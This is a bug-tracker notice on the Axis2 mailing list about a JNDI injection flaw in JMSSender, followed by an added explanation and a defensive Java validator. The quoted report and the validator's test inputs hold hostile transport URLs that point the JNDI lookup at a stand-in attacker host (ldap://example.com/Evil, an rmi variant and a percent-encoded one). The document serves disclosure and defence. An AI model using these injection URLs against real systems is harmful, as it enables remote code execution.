[ https://issues.apache.org/jira/browse/AXIS2-6062?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17925784#comment-17925784 ]
Robert Lazarski commented on AXIS2-6062:
----------------------------------------

Thanks for bringing this issue to our attention. I made the following commit, which passes our unit tests.

https://github.com/apache/axis-axis2-java-core/commit/3b2aeee3712a2b3269fdbda38e4c2315f59c5027

I am marking this issue closed, which will go out soon with 2.0.0.

> Is such flexibility necessary, allowing the LDAP (and RMI, JRMP, etc.) protocol
> in `JMSSender`?
> --------------------------------------------------------------------------------------------
>
>                 Key: AXIS2-6062
>                 URL: https://issues.apache.org/jira/browse/AXIS2-6062
>             Project: Axis2
>          Issue Type: Bug
>          Components: JMS transport
>    Affects Versions: 1.8.2
>            Reporter: Letian Yuan
>            Assignee: Robert Lazarski
>            Priority: Critical
>             Fix For: 2.0.0
>
>
> In "org.apache.axis2:axis2-transport-jms", there is a method,
> `org.apache.axis2.transport.jms.JMSSender.invoke`, designed to send a
> JMS message. However, if we send a JMS message like this:
>
>     import org.apache.axis2.context.MessageContext;
>     import org.apache.axis2.transport.jms.JMSSender;
>
>     MessageContext context = new MessageContext();
>     context.setProperty("TransportURL",
>         "jms://foobar?transport.jms.ConnectionFactoryJNDIName=ldap://example.com/Evil");
>     JMSSender sender = new JMSSender();
>     sender.invoke(context);
>
> Then, arbitrary commands from the remote server "ldap://example.com/Evil" would
> be executed.
> We want to discuss this with you.
> First, executing arbitrary commands from a remote server is quite dangerous.
> Second, as far as we know, no one would use the LDAP protocol to get a
> `ConnectionFactory`.
> Third, it seems this behavior has not been documented in your "User's Guide",
> so library users might not know this API for sending JMS messages can be used
> to execute arbitrary commands. So, I think that library users are very
> likely to misuse this API. For example, concatenating user input to the
> parameter of `invoke`.
> Or, making the parameter of `invoke`
> available in a configuration file such as `foobar.properties`. We
> know that such cases rarely happen and might not be your design purpose, but
> it is possible anyway. As long as an attacker can control the parameter of
> `invoke`, remote code injection might happen.
> Therefore, we want to ask you whether it is your design purpose and whether
> it is necessary for the LDAP protocol (and RMI, JRMP, etc.).
> This is just our opinion, and we are willing to discuss it with you.

--
This message was sent by Atlassian Jira
(v8.20.10#820010)

---------------------------------------------------------------------
To unsubscribe, e-mail: java-dev-unsubscr...@axis.apache.org
For additional commands, e-mail: java-dev-h...@axis.apache.org
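The issue above hinges on a general JNDI property: `InitialContext.lookup()` dispatches any name of the form `scheme:...` (ldap://, ldaps://, rmi://, iiop://, ...) to the matching URL context factory, regardless of which initial context the application configured, so a caller who controls the `transport.jms.ConnectionFactoryJNDIName` query parameter chooses which server is contacted. The class below is an added example, not Axis2 code and not what the linked commit does: it parses the `jms://` transport URL from the report, decodes the query (so a percent-encoded scheme such as `%6Cdap://` cannot slip past the check), and refuses any JNDI name carrying a URL scheme other than the local `java:` namespace before the name would ever reach a lookup. The hostname `example.com` is taken from the report; the default name `ConnectionFactory` and the method names are assumptions for illustration. Note that recent JDKs (8u191 / 11.0.1 and later) disable remote class loading from LDAP and RMI references by default, but a lookup against an attacker-controlled server can still return serialized objects that are deserialized locally, so rejecting scheme-bearing names before the lookup remains the right control.

```java
import java.net.URI;
import java.net.URISyntaxException;
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.util.LinkedHashMap;
import java.util.Map;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

/**
 * Added example (not Axis2 code): validate the JNDI name carried in a
 * jms:// transport URL before it is passed to InitialContext.lookup().
 * Requires Java 10+ for URLDecoder.decode(String, Charset).
 */
public final class JmsJndiNameGuard {

    // JNDI hands any "scheme:..." name to a URL context factory (ldap, ldaps,
    // rmi, iiop, ...) regardless of the configured initial context. Only the
    // local "java:" namespace is accepted by this guard.
    private static final Pattern SCHEME_PREFIX =
            Pattern.compile("^[A-Za-z][A-Za-z0-9+.-]*:");

    // Query parameter name exactly as it appears in the report's transport URL.
    static final String CF_JNDI_NAME = "transport.jms.ConnectionFactoryJNDIName";

    /** Splits the query part of a transport URL into decoded key/value pairs. */
    public static Map<String, String> parseQuery(String transportUrl) throws URISyntaxException {
        URI uri = new URI(transportUrl);
        Map<String, String> params = new LinkedHashMap<>();
        String rawQuery = uri.getRawQuery();
        if (rawQuery == null) {
            return params;
        }
        for (String pair : rawQuery.split("&")) {
            if (pair.isEmpty()) {
                continue;
            }
            int eq = pair.indexOf('=');
            String key = eq < 0 ? pair : pair.substring(0, eq);
            String value = eq < 0 ? "" : pair.substring(eq + 1);
            // Decode before validating, so "%6Cdap://" is seen as "ldap://".
            params.put(URLDecoder.decode(key, StandardCharsets.UTF_8),
                       URLDecoder.decode(value, StandardCharsets.UTF_8));
        }
        return params;
    }

    /** True only for plain names ("ConnectionFactory") or the "java:" namespace. */
    public static boolean isSafeJndiName(String name) {
        if (name == null || name.isEmpty()) {
            return false;
        }
        // Whitespace and control characters have no place in a JNDI name.
        for (int i = 0; i < name.length(); i++) {
            char c = name.charAt(i);
            if (Character.isWhitespace(c) || Character.isISOControl(c)) {
                return false;
            }
        }
        Matcher m = SCHEME_PREFIX.matcher(name);
        if (m.find()) {
            return m.group().equalsIgnoreCase("java:");
        }
        return true;
    }

    /** Returns the JNDI name to look up, or throws if the URL supplied an unsafe one. */
    public static String connectionFactoryJndiName(String transportUrl, String defaultName)
            throws URISyntaxException {
        String name = parseQuery(transportUrl).getOrDefault(CF_JNDI_NAME, defaultName);
        if (!isSafeJndiName(name)) {
            throw new IllegalArgumentException("Refusing JNDI name with URL scheme: " + name);
        }
        return name;
    }

    public static void main(String[] args) throws Exception {
        // Constructed inputs: the report's URL plus benign and encoded variants.
        String[] urls = {
            "jms://foobar?transport.jms.ConnectionFactoryJNDIName=ConnectionFactory",
            "jms://foobar?transport.jms.ConnectionFactoryJNDIName=java:comp/env/jms/CF",
            "jms://foobar?transport.jms.ConnectionFactoryJNDIName=ldap://example.com/Evil",
            "jms://foobar?transport.jms.ConnectionFactoryJNDIName=rmi://example.com/Evil",
            "jms://foobar?transport.jms.ConnectionFactoryJNDIName=%6Cdap://example.com/Evil",
        };
        for (String url : urls) {
            try {
                System.out.println("accepted: " + connectionFactoryJndiName(url, "ConnectionFactory"));
            } catch (IllegalArgumentException e) {
                System.out.println("rejected: " + e.getMessage());
            }
        }
    }
}
```

Running `main` accepts the first two URLs and rejects the three scheme-bearing ones, including the percent-encoded form. An allow-list of known names would be stricter still; the scheme check is the minimum that closes the path the report describes, and it belongs before the lookup rather than in a try/catch around it, because by the time the lookup fails the remote server has already been contacted.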